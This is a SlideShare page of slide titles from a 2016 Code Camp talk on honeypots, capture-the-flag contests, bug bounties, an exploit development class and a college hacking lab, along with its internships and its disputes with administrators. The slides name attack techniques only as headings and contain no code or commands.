Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Honeypots, Cybercompetitions, and Bug Bounties

227 views

Published on

Slides for a talk at Code Camp
Oct. 1, 2016
Sam Bowne
City College San Francisco
Twitter: @sambowne

Published in: Education
  • Be the first to comment

  • Be the first to like this

Honeypots, Cybercompetitions, and Bug Bounties

  1. 1. Honeypots, Cybercompetitions, and Bug Bounties Oct 1, 2016 Sam Bowne City College San Francisco All materials available at samsclass.info
  2. 2. Violent Python • Step-by-step project • Challenges • No instructions • Increasing difficulty • ty @mqaissaunee
  3. 3. April 2014: Heartbleed
  4. 4. Vulnerable Android Devices
  5. 5. A Job from One Tweet
  6. 6. Exploit Development Class
  7. 7. CNIT 127: Exploit Development
  8. 8. Buffer Overflow Vulnerability • Input more than 1024 bytes will overflow the buffer
  9. 9. DoS Exploit
  10. 10. Nonrepeating Pattern
  11. 11. Gnu Debugger
  12. 12. Generate Shellcode with msfvenom
  13. 13. Construct Exploit
  14. 14. The Stack Frame • The last word is the return value • Must jump into the NOP sled
  15. 15. Listening Shell
  16. 16. Pwnage Remote Code Execution
  17. 17. PHP Shell
  18. 18. Tripwire
  19. 19. Complete Report
  20. 20. Simple Violations Log
  21. 21. Vulnerability Disclosure
  22. 22. • ty @bugcrowd
  23. 23. Hacked by Anonsec
  24. 24. XSS
  25. 25. Rooted My Server
  26. 26. Rooted Twice the Same Way • My first attempt to patch the vulnerability failed • With the help of a student, I got my kernel updated after this
  27. 27. Stealing My Password • Shoulder surfing • http://tinyurl.com/ samspw
  28. 28. CTFs
  29. 29. How to Start 1. PicoCTF 2. EasyCTF 3. CTFTime
  30. 30. • Many levels, from very easy to very hard • Complete walkthroughs
  31. 31. Graphical Gameboard
  32. 32. • 1 week long • Many easy problems, but also hard ones • Sign up to hear about other easy CTFs
  33. 33. Write-Ups
  34. 34. Find CTFs
  35. 35. Walk-Throughs!
  36. 36. Hacking Club
  37. 37. Remote Speakers • Projector, webcam, Skype, speakers • Two talks from professional penetration testers
  38. 38. Student Contributions • Cleaning up the lab to make an inviting hangout space • Bridging to the CCSF_Coders club • Technical expertise from Google vuln labs • Hacker contacts from Defcon, etc.
  39. 39. Hacking Lab Free Fire Zone
  40. 40. Signs on Wall
  41. 41. Keylogger • One student wrote a Python keylogger and installed it on the lab machines
  42. 42. Internships
  43. 43. Employers • OpenDNS • NASA Ames • Lawrence Berkeley Lab • San Francisco Housing Authority • UCSF Medical Center
  44. 44. Job Fair • Students bring resumes at first (and only) class meeting • Employers describe jobs and grab applicants on the spot • Everyone welcome, including ex-students, students from the Computer Science department, students not enrolled in the internship class
  45. 45. Administrative Resistance • CCSF administrators cancelled the entire program in Spring 2015 • I only saved it by appealing directly to the Chancellor and threatening to resign • However, the person who cancelled it is now the Chancellor
  46. 46. Administrative Resistance • The new curriculum review process doesn't allow any class without lectures, textbook, final exam, etc. • This blocks seminar classes and Internship classes • The solution is to just break the rules--this is what tenure is for
  47. 47. Guest Speakers • At least one per class per semester • "Careers" class consisting of visiting industry speakers

×